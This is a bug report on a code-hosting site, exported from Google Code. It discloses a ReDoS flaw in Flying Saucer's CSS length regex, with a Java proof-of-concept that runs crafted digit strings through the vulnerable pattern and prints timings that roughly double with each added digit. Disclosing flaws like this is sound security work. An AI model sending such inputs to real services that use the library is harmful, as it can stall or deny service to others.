zhihongzzh / flying-saucer

Automatically exported from code.google.com/p/flying-saucer
0 stars 0 forks source link

Regexp cause ReDoS Attack #245

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
The class `Idents` may cause ReDoS attack.

File: 
[https://github.com/flyingsaucerproject/flyingsaucer/blob/master/flying-saucer-c
ore/src/main/java/org/xhtmlrenderer/css/constants/Idents.java Idents.java]

`Pattern CSS_LENGTH_PATTERN = Pattern.compile(RCSS_LENGTH);` in some data will 
get a pool performance.

Test Code is below:

{{{
public class R2Test {
    private final static String  RCSS_NUMBER        = "(-)?((\\d){1,10}((\\.)(\\d){1,10})?)";
    private final static String  RCSS_LENGTH        = "((0$)|((" + RCSS_NUMBER + ")+" + "((em)|(ex)|(px)|(cm)|(mm)|(in)|(pt)|(pc)|(%))))";
    private final static Pattern CSS_LENGTH_PATTERN = Pattern.compile(RCSS_LENGTH);

    public static void main(String[] args) {
        { // TEST1
            long start = System.currentTimeMillis();
            looksLikeALength("1111111111111111111111,");
            System.out.println((System.currentTimeMillis() - start) + " ms");
        }
        { // TEST2
            long start = System.currentTimeMillis();
            looksLikeALength("11111111111111111111111,");
            System.out.println((System.currentTimeMillis() - start) + " ms");
        }
        { // TEST3
            long start = System.currentTimeMillis();
            looksLikeALength("111111111111111111111111,");
            System.out.println((System.currentTimeMillis() - start) + " ms");
        }
        { // TEST4
            long start = System.currentTimeMillis();
            looksLikeALength("1111111111111111111111111,");
            System.out.println((System.currentTimeMillis() - start) + " ms");
        }

    }

    public static boolean looksLikeALength(String val) {
        return CSS_LENGTH_PATTERN.matcher(val).matches();
    }
}
}}}

Test result:
{{{
960 ms
1912 ms
3753 ms
7650 ms
}}}

Original issue reported on code.google.com by jht5...@gmail.com on 26 Sep 2014 at 2:17